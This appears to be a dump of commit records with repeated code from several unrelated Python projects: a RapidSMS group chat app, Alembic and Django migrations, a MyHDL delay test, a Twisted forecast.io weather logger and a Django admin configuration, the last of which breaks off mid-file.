facility=reporter.facility).values_list('contact', flat=True)
))
else:
msg.respond("Sorry, you're not registered to a facility")
recipients.discard(msg.connection)
sender = msg.connection.identity
text = "{0}: {1}".format(sender, msg.text)
# respond to sender
sender_text = "sent to {0} members of {1}".format(len(recipients),
reporter.facility)
msg.respond(sender_text)
# 'respond' to group members
msg.respond(text, connections=list(recipients))
def handle(self, msg):
groups = []
mentions = []
for token in msg.text.split():
if token.startswith("#"):
groups.append(token[1:])
if token.startswith("@"):
mentions.append(token[1:])
groups = [i.lower() for i in groups]
mentions = [i.lower() for i in mentions]
if 'chat' in groups or 'chat' in mentions:
            # matched the chat tag; relay the message to reporters
            # from the sender's facility
self._send_chat_msg(msg)
return True
|
Add group chatting capability with the use of a special group chat#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
from rapidsms.apps.base import AppBase
from rapidsms.models import Connection
#from rapidsms.contrib.messagelog.models import Message
from .models import Reporter
class Chat(AppBase):
def _send_chat_msg(self, msg):
if msg.contact is None:
msg.respond('Sorry you must be a registered reporter')
return
reporter = Reporter.objects.filter(contact=msg.contact)
if not reporter:
msg.respond('Sorry you must be a registered reporter')
return
reporter = reporter[0]
if reporter.facility:
recipients = set(Connection.objects.filter(
contact__in=Reporter.objects.filter(
facility=reporter.facility).values_list('contact', flat=True)
))
else:
msg.respond("Sorry, you're not registered to a facility")
recipients.discard(msg.connection)
sender = msg.connection.identity
text = "{0}: {1}".format(sender, msg.text)
# respond to sender
sender_text = "sent to {0} members of {1}".format(len(recipients),
reporter.facility)
msg.respond(sender_text)
# 'respond' to group members
msg.respond(text, connections=list(recipients))
def handle(self, msg):
groups = []
mentions = []
for token in msg.text.split():
if token.startswith("#"):
groups.append(token[1:])
if token.startswith("@"):
mentions.append(token[1:])
groups = [i.lower() for i in groups]
mentions = [i.lower() for i in mentions]
if 'chat' in groups or 'chat' in mentions:
            # matched the chat tag; relay the message to reporters
            # from the sender's facility
self._send_chat_msg(msg)
return True
|
<commit_before><commit_msg>Add group chatting capability with the use of a special group chat<commit_after>#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
from rapidsms.apps.base import AppBase
from rapidsms.models import Connection
#from rapidsms.contrib.messagelog.models import Message
from .models import Reporter
class Chat(AppBase):
def _send_chat_msg(self, msg):
if msg.contact is None:
msg.respond('Sorry you must be a registered reporter')
return
reporter = Reporter.objects.filter(contact=msg.contact)
if not reporter:
msg.respond('Sorry you must be a registered reporter')
return
reporter = reporter[0]
if reporter.facility:
recipients = set(Connection.objects.filter(
contact__in=Reporter.objects.filter(
facility=reporter.facility).values_list('contact', flat=True)
))
else:
msg.respond("Sorry, you're not registered to a facility")
recipients.discard(msg.connection)
sender = msg.connection.identity
text = "{0}: {1}".format(sender, msg.text)
# respond to sender
sender_text = "sent to {0} members of {1}".format(len(recipients),
reporter.facility)
msg.respond(sender_text)
# 'respond' to group members
msg.respond(text, connections=list(recipients))
def handle(self, msg):
groups = []
mentions = []
for token in msg.text.split():
if token.startswith("#"):
groups.append(token[1:])
if token.startswith("@"):
mentions.append(token[1:])
groups = [i.lower() for i in groups]
mentions = [i.lower() for i in mentions]
if 'chat' in groups or 'chat' in mentions:
            # matched the chat tag; relay the message to reporters
            # from the sender's facility
self._send_chat_msg(msg)
return True
|
|
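As a quick standalone illustration of the routing convention Chat.handle implements (not part of the commit), the #group/@mention token parsing can be exercised on its own:
# Illustration of the token convention used by Chat.handle above.
def parse_tokens(text):
    tokens = text.split()
    groups = [t[1:].lower() for t in tokens if t.startswith('#')]
    mentions = [t[1:].lower() for t in tokens if t.startswith('@')]
    return groups, mentions
groups, mentions = parse_tokens('#chat stock has arrived @clinic')
assert groups == ['chat'] and mentions == ['clinic']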
181c10f604cfc89181c548a3527b12ccdfbed596
|
migrations/versions/430_add_entries_to_lots_table_for_dos.py
|
migrations/versions/430_add_entries_to_lots_table_for_dos.py
|
"""add entries to lots table for DOS
Revision ID: 430
Revises: 420
Create Date: 2015-11-16 11:34:41.412730
"""
# revision identifiers, used by Alembic.
revision = '430'
down_revision = '420'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.sql import table, column
def upgrade():
# Insert DOS lot records
lot_table = table(
'lots',
column('name', sa.String),
column('slug', sa.String),
column('one_service_limit', sa.Boolean)
)
op.bulk_insert(lot_table, [
{'name': 'Digital outcomes', 'slug': 'digital-outcomes', 'one_service_limit': True},
{'name': 'Digital specialists', 'slug': 'digital-specialists', 'one_service_limit': True},
{'name': 'User research studios', 'slug': 'user-research-studios',
'one_service_limit': False},
{'name': 'User research participants', 'slug': 'user-research-participants',
'one_service_limit': True},
])
conn = op.get_bind()
res = conn.execute("SELECT id FROM frameworks WHERE slug = 'digital-outcomes-and-specialists'")
framework = list(res.fetchall())
res = conn.execute("SELECT id FROM lots WHERE slug in ('digital-outcomes'," +
"'digital-specialists', 'user-research-studios'," +
" 'user-research-participants')")
lots = list(res.fetchall())
if len(framework) == 0:
raise Exception("Framework not found")
for lot in lots:
op.execute("INSERT INTO framework_lots (framework_id, lot_id) VALUES({}, {})".format(
framework[0]["id"], lot["id"]))
def downgrade():
conn = op.get_bind()
res = conn.execute("SELECT id FROM frameworks WHERE slug = 'digital-outcomes-and-specialists'")
framework = list(res.fetchall())
op.execute("""
DELETE FROM framework_lots WHERE framework_id={}
""".format(framework[0]['id']))
op.execute("""
DELETE from lots WHERE slug in ('digital-outcomes', 'digital-specialists',
'user-research-studios', 'user-research-participants');
""")
|
Add data migration for dos entries in lots table
|
Add data migration for dos entries in lots table
|
Python
|
mit
|
alphagov/digitalmarketplace-api,alphagov/digitalmarketplace-api,alphagov/digitalmarketplace-api
|
Add data migration for dos entries in lots table
|
"""add entries to lots table for DOS
Revision ID: 430
Revises: 420
Create Date: 2015-11-16 11:34:41.412730
"""
# revision identifiers, used by Alembic.
revision = '430'
down_revision = '420'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.sql import table, column
def upgrade():
# Insert DOS lot records
lot_table = table(
'lots',
column('name', sa.String),
column('slug', sa.String),
column('one_service_limit', sa.Boolean)
)
op.bulk_insert(lot_table, [
{'name': 'Digital outcomes', 'slug': 'digital-outcomes', 'one_service_limit': True},
{'name': 'Digital specialists', 'slug': 'digital-specialists', 'one_service_limit': True},
{'name': 'User research studios', 'slug': 'user-research-studios',
'one_service_limit': False},
{'name': 'User research participants', 'slug': 'user-research-participants',
'one_service_limit': True},
])
conn = op.get_bind()
res = conn.execute("SELECT id FROM frameworks WHERE slug = 'digital-outcomes-and-specialists'")
framework = list(res.fetchall())
res = conn.execute("SELECT id FROM lots WHERE slug in ('digital-outcomes'," +
"'digital-specialists', 'user-research-studios'," +
" 'user-research-participants')")
lots = list(res.fetchall())
if len(framework) == 0:
raise Exception("Framework not found")
for lot in lots:
op.execute("INSERT INTO framework_lots (framework_id, lot_id) VALUES({}, {})".format(
framework[0]["id"], lot["id"]))
def downgrade():
conn = op.get_bind()
res = conn.execute("SELECT id FROM frameworks WHERE slug = 'digital-outcomes-and-specialists'")
framework = list(res.fetchall())
op.execute("""
DELETE FROM framework_lots WHERE framework_id={}
""".format(framework[0]['id']))
op.execute("""
DELETE from lots WHERE slug in ('digital-outcomes', 'digital-specialists',
'user-research-studios', 'user-research-participants');
""")
|
<commit_before><commit_msg>Add data migration for dos entries in lots table<commit_after>
|
"""add entries to lots table for DOS
Revision ID: 430
Revises: 420
Create Date: 2015-11-16 11:34:41.412730
"""
# revision identifiers, used by Alembic.
revision = '430'
down_revision = '420'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.sql import table, column
def upgrade():
# Insert DOS lot records
lot_table = table(
'lots',
column('name', sa.String),
column('slug', sa.String),
column('one_service_limit', sa.Boolean)
)
op.bulk_insert(lot_table, [
{'name': 'Digital outcomes', 'slug': 'digital-outcomes', 'one_service_limit': True},
{'name': 'Digital specialists', 'slug': 'digital-specialists', 'one_service_limit': True},
{'name': 'User research studios', 'slug': 'user-research-studios',
'one_service_limit': False},
{'name': 'User research participants', 'slug': 'user-research-participants',
'one_service_limit': True},
])
conn = op.get_bind()
res = conn.execute("SELECT id FROM frameworks WHERE slug = 'digital-outcomes-and-specialists'")
framework = list(res.fetchall())
res = conn.execute("SELECT id FROM lots WHERE slug in ('digital-outcomes'," +
"'digital-specialists', 'user-research-studios'," +
" 'user-research-participants')")
lots = list(res.fetchall())
if len(framework) == 0:
raise Exception("Framework not found")
for lot in lots:
op.execute("INSERT INTO framework_lots (framework_id, lot_id) VALUES({}, {})".format(
framework[0]["id"], lot["id"]))
def downgrade():
conn = op.get_bind()
res = conn.execute("SELECT id FROM frameworks WHERE slug = 'digital-outcomes-and-specialists'")
framework = list(res.fetchall())
op.execute("""
DELETE FROM framework_lots WHERE framework_id={}
""".format(framework[0]['id']))
op.execute("""
DELETE from lots WHERE slug in ('digital-outcomes', 'digital-specialists',
'user-research-studios', 'user-research-participants');
""")
|
Add data migration for dos entries in lots table"""add entries to lots table for DOS
Revision ID: 430
Revises: 420
Create Date: 2015-11-16 11:34:41.412730
"""
# revision identifiers, used by Alembic.
revision = '430'
down_revision = '420'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.sql import table, column
def upgrade():
# Insert DOS lot records
lot_table = table(
'lots',
column('name', sa.String),
column('slug', sa.String),
column('one_service_limit', sa.Boolean)
)
op.bulk_insert(lot_table, [
{'name': 'Digital outcomes', 'slug': 'digital-outcomes', 'one_service_limit': True},
{'name': 'Digital specialists', 'slug': 'digital-specialists', 'one_service_limit': True},
{'name': 'User research studios', 'slug': 'user-research-studios',
'one_service_limit': False},
{'name': 'User research participants', 'slug': 'user-research-participants',
'one_service_limit': True},
])
conn = op.get_bind()
res = conn.execute("SELECT id FROM frameworks WHERE slug = 'digital-outcomes-and-specialists'")
framework = list(res.fetchall())
res = conn.execute("SELECT id FROM lots WHERE slug in ('digital-outcomes'," +
"'digital-specialists', 'user-research-studios'," +
" 'user-research-participants')")
lots = list(res.fetchall())
if len(framework) == 0:
raise Exception("Framework not found")
for lot in lots:
op.execute("INSERT INTO framework_lots (framework_id, lot_id) VALUES({}, {})".format(
framework[0]["id"], lot["id"]))
def downgrade():
conn = op.get_bind()
res = conn.execute("SELECT id FROM frameworks WHERE slug = 'digital-outcomes-and-specialists'")
framework = list(res.fetchall())
op.execute("""
DELETE FROM framework_lots WHERE framework_id={}
""".format(framework[0]['id']))
op.execute("""
DELETE from lots WHERE slug in ('digital-outcomes', 'digital-specialists',
'user-research-studios', 'user-research-participants');
""")
|
<commit_before><commit_msg>Add data migration for dos entries in lots table<commit_after>"""add entries to lots table for DOS
Revision ID: 430
Revises: 420
Create Date: 2015-11-16 11:34:41.412730
"""
# revision identifiers, used by Alembic.
revision = '430'
down_revision = '420'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.sql import table, column
def upgrade():
# Insert DOS lot records
lot_table = table(
'lots',
column('name', sa.String),
column('slug', sa.String),
column('one_service_limit', sa.Boolean)
)
op.bulk_insert(lot_table, [
{'name': 'Digital outcomes', 'slug': 'digital-outcomes', 'one_service_limit': True},
{'name': 'Digital specialists', 'slug': 'digital-specialists', 'one_service_limit': True},
{'name': 'User research studios', 'slug': 'user-research-studios',
'one_service_limit': False},
{'name': 'User research participants', 'slug': 'user-research-participants',
'one_service_limit': True},
])
conn = op.get_bind()
res = conn.execute("SELECT id FROM frameworks WHERE slug = 'digital-outcomes-and-specialists'")
framework = list(res.fetchall())
res = conn.execute("SELECT id FROM lots WHERE slug in ('digital-outcomes'," +
"'digital-specialists', 'user-research-studios'," +
" 'user-research-participants')")
lots = list(res.fetchall())
if len(framework) == 0:
raise Exception("Framework not found")
for lot in lots:
op.execute("INSERT INTO framework_lots (framework_id, lot_id) VALUES({}, {})".format(
framework[0]["id"], lot["id"]))
def downgrade():
conn = op.get_bind()
res = conn.execute("SELECT id FROM frameworks WHERE slug = 'digital-outcomes-and-specialists'")
framework = list(res.fetchall())
op.execute("""
DELETE FROM framework_lots WHERE framework_id={}
""".format(framework[0]['id']))
op.execute("""
DELETE from lots WHERE slug in ('digital-outcomes', 'digital-specialists',
'user-research-studios', 'user-research-participants');
""")
|
|
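A side note on the raw INSERT in the migration above: the same statement can be written with bound parameters instead of str.format, which avoids quoting pitfalls. A sketch against the same Alembic connection, illustrative only:
# Sketch: parameterized version of the framework_lots insert.
from sqlalchemy.sql import text
def link_framework_lots(conn, framework_id, lot_ids):
    stmt = text('INSERT INTO framework_lots (framework_id, lot_id) '
                'VALUES (:framework_id, :lot_id)')
    for lot_id in lot_ids:
        conn.execute(stmt, {'framework_id': framework_id, 'lot_id': lot_id})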
fb7e60951fc790398ce10dcbaf2f5bcd6151520d
|
osf/migrations/0148_merge_20181213_2253.py
|
osf/migrations/0148_merge_20181213_2253.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-12-13 22:53
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('osf', '0147_blacklistedemaildomain'),
('osf', '0147_repoint_preprint_pagecounters'),
]
operations = [
]
|
Add final divorce merge migration
|
Add final divorce merge migration
|
Python
|
apache-2.0
|
mfraezz/osf.io,adlius/osf.io,pattisdr/osf.io,mfraezz/osf.io,felliott/osf.io,brianjgeiger/osf.io,Johnetordoff/osf.io,pattisdr/osf.io,felliott/osf.io,CenterForOpenScience/osf.io,pattisdr/osf.io,aaxelb/osf.io,saradbowman/osf.io,mattclark/osf.io,brianjgeiger/osf.io,Johnetordoff/osf.io,brianjgeiger/osf.io,CenterForOpenScience/osf.io,baylee-d/osf.io,Johnetordoff/osf.io,felliott/osf.io,cslzchen/osf.io,cslzchen/osf.io,cslzchen/osf.io,cslzchen/osf.io,felliott/osf.io,mfraezz/osf.io,aaxelb/osf.io,Johnetordoff/osf.io,brianjgeiger/osf.io,adlius/osf.io,aaxelb/osf.io,saradbowman/osf.io,mfraezz/osf.io,adlius/osf.io,CenterForOpenScience/osf.io,aaxelb/osf.io,mattclark/osf.io,baylee-d/osf.io,CenterForOpenScience/osf.io,baylee-d/osf.io,mattclark/osf.io,adlius/osf.io
|
Add final divorce merge migration
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-12-13 22:53
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('osf', '0147_blacklistedemaildomain'),
('osf', '0147_repoint_preprint_pagecounters'),
]
operations = [
]
|
<commit_before><commit_msg>Add final divorce merge migration<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-12-13 22:53
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('osf', '0147_blacklistedemaildomain'),
('osf', '0147_repoint_preprint_pagecounters'),
]
operations = [
]
|
Add final divorce merge migration# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-12-13 22:53
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('osf', '0147_blacklistedemaildomain'),
('osf', '0147_repoint_preprint_pagecounters'),
]
operations = [
]
|
<commit_before><commit_msg>Add final divorce merge migration<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-12-13 22:53
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('osf', '0147_blacklistedemaildomain'),
('osf', '0147_repoint_preprint_pagecounters'),
]
operations = [
]
|
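For reference, an empty merge migration like this one is normally generated rather than written by hand; Django emits it when two branches both added an 0147 migration. The standard command (app label taken from this repo) is:
# python manage.py makemigrations osf --merge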
|
f61440f8b51e8d1e30a94d71eb1fac42ee4818b9
|
myhdl/test/conversion/toVHDL/test_delay.py
|
myhdl/test/conversion/toVHDL/test_delay.py
|
from __future__ import absolute_import
from myhdl import *
def bench_delay():
clock = Signal(False)
HALF_PERIOD = 10
@instance
def clockgen():
clock.next = False
while True:
yield delay(HALF_PERIOD)
clock.next = not clock
@instance
def stimulus():
for i in range(16):
yield clock.posedge
print(now())
raise StopSimulation
return instances()
def test_delay():
assert conversion.verify(bench_delay) == 0
|
Solve a problem with time constants
|
Solve a problem with time constants
|
Python
|
lgpl-2.1
|
jmgc/myhdl-numeric,jmgc/myhdl-numeric,jmgc/myhdl-numeric
|
Solve a problem with time constants
|
from __future__ import absolute_import
from myhdl import *
def bench_delay():
clock = Signal(False)
HALF_PERIOD = 10
@instance
def clockgen():
clock.next = False
while True:
yield delay(HALF_PERIOD)
clock.next = not clock
@instance
def stimulus():
for i in range(16):
yield clock.posedge
print(now())
raise StopSimulation
return instances()
def test_delay():
assert conversion.verify(bench_delay) == 0
|
<commit_before><commit_msg>Solve a problem with time constants<commit_after>
|
from __future__ import absolute_import
from myhdl import *
def bench_delay():
clock = Signal(False)
HALF_PERIOD = 10
@instance
def clockgen():
clock.next = False
while True:
yield delay(HALF_PERIOD)
clock.next = not clock
@instance
def stimulus():
for i in range(16):
yield clock.posedge
print(now())
raise StopSimulation
return instances()
def test_delay():
assert conversion.verify(bench_delay) == 0
|
Solve a problem with time constantsfrom __future__ import absolute_import
from myhdl import *
def bench_delay():
clock = Signal(False)
HALF_PERIOD = 10
@instance
def clockgen():
clock.next = False
while True:
yield delay(HALF_PERIOD)
clock.next = not clock
@instance
def stimulus():
for i in range(16):
yield clock.posedge
print(now())
raise StopSimulation
return instances()
def test_delay():
assert conversion.verify(bench_delay) == 0
|
<commit_before><commit_msg>Solve a problem with time constants<commit_after>from __future__ import absolute_import
from myhdl import *
def bench_delay():
clock = Signal(False)
HALF_PERIOD = 10
@instance
def clockgen():
clock.next = False
while True:
yield delay(HALF_PERIOD)
clock.next = not clock
@instance
def stimulus():
for i in range(16):
yield clock.posedge
print(now())
raise StopSimulation
return instances()
def test_delay():
assert conversion.verify(bench_delay) == 0
|
|
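Besides conversion.verify, the same bench can be run as a plain MyHDL simulation, which is handy when chasing timing issues like the one this commit addresses (sketch, assuming a standard myhdl install):
# Run the bench directly instead of through the VHDL conversion check.
from myhdl import Simulation
sim = Simulation(bench_delay())
sim.run()   # stops when stimulus raises StopSimulation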
6cba5b2507afa123a79a3def08a92568952c6937
|
weatherlogger.py
|
weatherlogger.py
|
from twisted.internet import task, reactor, defer, protocol
from twisted.web.client import Agent
class ResponseReader(protocol.Protocol):
def __init__(self, finished):
self.finished = finished
self.buffer = ''
def dataReceived(self, data):
self.buffer += data
def connectionLost(self, reason):
self.finished.callback(self.buffer)
class WeatherLogger():
def __init__(self, settings):
self.settings = settings
interval = self.settings['weather']['interval']
self.apikey = self.settings['weather']['apikey']
self.latitude = self.settings['weather']['latitude']
self.longitude = self.settings['weather']['longitude']
self.agent = Agent(reactor)
self.monitortask = task.LoopingCall(self.UpdateWeather)
self.monitortask.start(interval)
def UpdateWeather(self):
        url = 'https://api.forecast.io/forecast/{0}/{1},{2}?exclude=minutely,hourly,daily'.format(self.apikey, self.latitude, self.longitude)
print "Updating Weather from", url
d = self.agent.request('GET',url)
d.addCallback(self.GotResponse)
def GotResponse(self, response):
if response.code == 200:
d = defer.Deferred()
response.deliverBody(ResponseReader(d))
d.addCallback(self.ProcessBody)
return d
def ProcessBody(self, body):
print body
if __name__=="__main__":
from configuration import Configuration
conf = Configuration()
logger = WeatherLogger(conf.settings)
reactor.run()
|
Implement basic weather API call
|
Implement basic weather API call
|
Python
|
mit
|
msieker/pimonitor,johan--/pimonitor
|
Implement basic weather API call
|
from twisted.internet import task, reactor, defer, protocol
from twisted.web.client import Agent
class ResponseReader(protocol.Protocol):
def __init__(self, finished):
self.finished = finished
self.buffer = ''
def dataReceived(self, data):
self.buffer += data
def connectionLost(self, reason):
self.finished.callback(self.buffer)
class WeatherLogger():
def __init__(self, settings):
self.settings = settings
interval = self.settings['weather']['interval']
self.apikey = self.settings['weather']['apikey']
self.latitude = self.settings['weather']['latitude']
self.longitude = self.settings['weather']['longitude']
self.agent = Agent(reactor)
self.monitortask = task.LoopingCall(self.UpdateWeather)
self.monitortask.start(interval)
def UpdateWeather(self):
        url = 'https://api.forecast.io/forecast/{0}/{1},{2}?exclude=minutely,hourly,daily'.format(self.apikey, self.latitude, self.longitude)
print "Updating Weather from", url
d = self.agent.request('GET',url)
d.addCallback(self.GotResponse)
def GotResponse(self, response):
if response.code == 200:
d = defer.Deferred()
response.deliverBody(ResponseReader(d))
d.addCallback(self.ProcessBody)
return d
def ProcessBody(self, body):
print body
if __name__=="__main__":
from configuration import Configuration
conf = Configuration()
logger = WeatherLogger(conf.settings)
reactor.run()
|
<commit_before><commit_msg>Implement basic weather API call<commit_after>
|
from twisted.internet import task, reactor, defer, protocol
from twisted.web.client import Agent
class ResponseReader(protocol.Protocol):
def __init__(self, finished):
self.finished = finished
self.buffer = ''
def dataReceived(self, data):
self.buffer += data
def connectionLost(self, reason):
self.finished.callback(self.buffer)
class WeatherLogger():
def __init__(self, settings):
self.settings = settings
interval = self.settings['weather']['interval']
self.apikey = self.settings['weather']['apikey']
self.latitude = self.settings['weather']['latitude']
self.longitude = self.settings['weather']['longitude']
self.agent = Agent(reactor)
self.monitortask = task.LoopingCall(self.UpdateWeather)
self.monitortask.start(interval)
def UpdateWeather(self):
        url = 'https://api.forecast.io/forecast/{0}/{1},{2}?exclude=minutely,hourly,daily'.format(self.apikey, self.latitude, self.longitude)
print "Updating Weather from", url
d = self.agent.request('GET',url)
d.addCallback(self.GotResponse)
def GotResponse(self, response):
if response.code == 200:
d = defer.Deferred()
response.deliverBody(ResponseReader(d))
d.addCallback(self.ProcessBody)
return d
def ProcessBody(self, body):
print body
if __name__=="__main__":
from configuration import Configuration
conf = Configuration()
logger = WeatherLogger(conf.settings)
reactor.run()
|
Implement basic weather API callfrom twisted.internet import task, reactor, defer, protocol
from twisted.web.client import Agent
class ResponseReader(protocol.Protocol):
def __init__(self, finished):
self.finished = finished
self.buffer = ''
def dataReceived(self, data):
self.buffer += data
def connectionLost(self, reason):
self.finished.callback(self.buffer)
class WeatherLogger():
def __init__(self, settings):
self.settings = settings
interval = self.settings['weather']['interval']
self.apikey = self.settings['weather']['apikey']
self.latitude = self.settings['weather']['latitude']
self.longitude = self.settings['weather']['longitude']
self.agent = Agent(reactor)
self.monitortask = task.LoopingCall(self.UpdateWeather)
self.monitortask.start(interval)
def UpdateWeather(self):
        url = 'https://api.forecast.io/forecast/{0}/{1},{2}?exclude=minutely,hourly,daily'.format(self.apikey, self.latitude, self.longitude)
print "Updating Weather from", url
d = self.agent.request('GET',url)
d.addCallback(self.GotResponse)
def GotResponse(self, response):
if response.code == 200:
d = defer.Deferred()
response.deliverBody(ResponseReader(d))
d.addCallback(self.ProcessBody)
return d
def ProcessBody(self, body):
print body
if __name__=="__main__":
from configuration import Configuration
conf = Configuration()
logger = WeatherLogger(conf.settings)
reactor.run()
|
<commit_before><commit_msg>Implement basic weather API call<commit_after>from twisted.internet import task, reactor, defer, protocol
from twisted.web.client import Agent
class ResponseReader(protocol.Protocol):
def __init__(self, finished):
self.finished = finished
self.buffer = ''
def dataReceived(self, data):
self.buffer += data
def connectionLost(self, reason):
self.finished.callback(self.buffer)
class WeatherLogger():
def __init__(self, settings):
self.settings = settings
interval = self.settings['weather']['interval']
self.apikey = self.settings['weather']['apikey']
self.latitude = self.settings['weather']['latitude']
self.longitude = self.settings['weather']['longitude']
self.agent = Agent(reactor)
self.monitortask = task.LoopingCall(self.UpdateWeather)
self.monitortask.start(interval)
def UpdateWeather(self):
        url = 'https://api.forecast.io/forecast/{0}/{1},{2}?exclude=minutely,hourly,daily'.format(self.apikey, self.latitude, self.longitude)
print "Updating Weather from", url
d = self.agent.request('GET',url)
d.addCallback(self.GotResponse)
def GotResponse(self, response):
if response.code == 200:
d = defer.Deferred()
response.deliverBody(ResponseReader(d))
d.addCallback(self.ProcessBody)
return d
def ProcessBody(self, body):
print body
if __name__=="__main__":
from configuration import Configuration
conf = Configuration()
logger = WeatherLogger(conf.settings)
reactor.run()
|
|
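ProcessBody above just prints the raw body; a likely next step is JSON decoding. A sketch in the same Python 2 style, using field names from the public forecast.io docs (treat the exact keys as an assumption):
# Sketch: decode the forecast.io response body.
import json
def process_body(body):
    data = json.loads(body)
    currently = data.get('currently', {})
    print currently.get('summary'), currently.get('temperature')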
3a06f01a9440b05b87bebc33d1342cd71fbeefbb
|
samples/admin.py
|
samples/admin.py
|
from django.contrib import admin
from .models import Patient, PatientRegister, FluVaccine, Sample, CollectionType
class FluVaccineInline(admin.StackedInline):
model = FluVaccine
extra = 1
class SampleInline(admin.StackedInline):
model = Sample
extra = 1
class PatientRegisterAdmin(admin.ModelAdmin):
fieldsets = [
('Informações do Paciente', {'fields': ['patient']}),
('Dados institucionais', {'fields': ['id_gal_origin']}),
]
inlines = [
SampleInline,
FluVaccineInline,
]
admin.site.register(Patient)
admin.site.register(Sample)
admin.site.register(CollectionType)
admin.site.register(PatientRegister, PatientRegisterAdmin)
|
from django.contrib import admin
from .models import (
Patient, PatientRegister,
FluVaccine,
Sample, CollectionType,
Symptom, ObservedSymptom
)
class FluVaccineInline(admin.StackedInline):
model = FluVaccine
extra = 1
class SampleInline(admin.StackedInline):
model = Sample
extra = 1
class ObservedSymptomInline(admin.StackedInline):
model = ObservedSymptom
extra = 2
class PatientRegisterAdmin(admin.ModelAdmin):
fieldsets = [
('Informações do Paciente', {'fields': ['patient']}),
('Dados institucionais', {'fields': ['id_gal_origin']}),
]
inlines = [
SampleInline,
FluVaccineInline,
ObservedSymptomInline,
]
admin.site.register(Patient)
admin.site.register(PatientRegister, PatientRegisterAdmin)
admin.site.register(Sample)
admin.site.register(CollectionType)
admin.site.register(Symptom)
|
Add Symptoms and ObservedSymptoms to Admin
|
:rocket: Add Symptoms and ObservedSymptoms to Admin
|
Python
|
mit
|
gems-uff/labsys,gems-uff/labsys,gcrsaldanha/fiocruz,gcrsaldanha/fiocruz,gems-uff/labsys
|
from django.contrib import admin
from .models import Patient, PatientRegister, FluVaccine, Sample, CollectionType
class FluVaccineInline(admin.StackedInline):
model = FluVaccine
extra = 1
class SampleInline(admin.StackedInline):
model = Sample
extra = 1
class PatientRegisterAdmin(admin.ModelAdmin):
fieldsets = [
('Informações do Paciente', {'fields': ['patient']}),
('Dados institucionais', {'fields': ['id_gal_origin']}),
]
inlines = [
SampleInline,
FluVaccineInline,
]
admin.site.register(Patient)
admin.site.register(Sample)
admin.site.register(CollectionType)
admin.site.register(PatientRegister, PatientRegisterAdmin)
:rocket: Add Symptoms and ObservedSymptoms to Admin
|
from django.contrib import admin
from .models import (
Patient, PatientRegister,
FluVaccine,
Sample, CollectionType,
Symptom, ObservedSymptom
)
class FluVaccineInline(admin.StackedInline):
model = FluVaccine
extra = 1
class SampleInline(admin.StackedInline):
model = Sample
extra = 1
class ObservedSymptomInline(admin.StackedInline):
model = ObservedSymptom
extra = 2
class PatientRegisterAdmin(admin.ModelAdmin):
fieldsets = [
('Informações do Paciente', {'fields': ['patient']}),
('Dados institucionais', {'fields': ['id_gal_origin']}),
]
inlines = [
SampleInline,
FluVaccineInline,
ObservedSymptomInline,
]
admin.site.register(Patient)
admin.site.register(PatientRegister, PatientRegisterAdmin)
admin.site.register(Sample)
admin.site.register(CollectionType)
admin.site.register(Symptom)
|
<commit_before>from django.contrib import admin
from .models import Patient, PatientRegister, FluVaccine, Sample, CollectionType
class FluVaccineInline(admin.StackedInline):
model = FluVaccine
extra = 1
class SampleInline(admin.StackedInline):
model = Sample
extra = 1
class PatientRegisterAdmin(admin.ModelAdmin):
fieldsets = [
('Informações do Paciente', {'fields': ['patient']}),
('Dados institucionais', {'fields': ['id_gal_origin']}),
]
inlines = [
SampleInline,
FluVaccineInline,
]
admin.site.register(Patient)
admin.site.register(Sample)
admin.site.register(CollectionType)
admin.site.register(PatientRegister, PatientRegisterAdmin)
<commit_msg>:rocket: Add Symptoms and ObservedSymptoms to Admin<commit_after>
|
from django.contrib import admin
from .models import (
Patient, PatientRegister,
FluVaccine,
Sample, CollectionType,
Symptom, ObservedSymptom
)
class FluVaccineInline(admin.StackedInline):
model = FluVaccine
extra = 1
class SampleInline(admin.StackedInline):
model = Sample
extra = 1
class ObservedSymptomInline(admin.StackedInline):
model = ObservedSymptom
extra = 2
class PatientRegisterAdmin(admin.ModelAdmin):
fieldsets = [
('Informações do Paciente', {'fields': ['patient']}),
('Dados institucionais', {'fields': ['id_gal_origin']}),
]
inlines = [
SampleInline,
FluVaccineInline,
ObservedSymptomInline,
]
admin.site.register(Patient)
admin.site.register(PatientRegister, PatientRegisterAdmin)
admin.site.register(Sample)
admin.site.register(CollectionType)
admin.site.register(Symptom)
|
from django.contrib import admin
from .models import Patient, PatientRegister, FluVaccine, Sample, CollectionType
class FluVaccineInline(admin.StackedInline):
model = FluVaccine
extra = 1
class SampleInline(admin.StackedInline):
model = Sample
extra = 1
class PatientRegisterAdmin(admin.ModelAdmin):
fieldsets = [
('Informações do Paciente', {'fields': ['patient']}),
('Dados institucionais', {'fields': ['id_gal_origin']}),
]
inlines = [
SampleInline,
FluVaccineInline,
]
admin.site.register(Patient)
admin.site.register(Sample)
admin.site.register(CollectionType)
admin.site.register(PatientRegister, PatientRegisterAdmin)
:rocket: Add Symptoms and ObservedSymptoms to Adminfrom django.contrib import admin
from .models import (
Patient, PatientRegister,
FluVaccine,
Sample, CollectionType,
Symptom, ObservedSymptom
)
class FluVaccineInline(admin.StackedInline):
model = FluVaccine
extra = 1
class SampleInline(admin.StackedInline):
model = Sample
extra = 1
class ObservedSymptomInline(admin.StackedInline):
model = ObservedSymptom
extra = 2
class PatientRegisterAdmin(admin.ModelAdmin):
fieldsets = [
('Informações do Paciente', {'fields': ['patient']}),
('Dados institucionais', {'fields': ['id_gal_origin']}),
]
inlines = [
SampleInline,
FluVaccineInline,
ObservedSymptomInline,
]
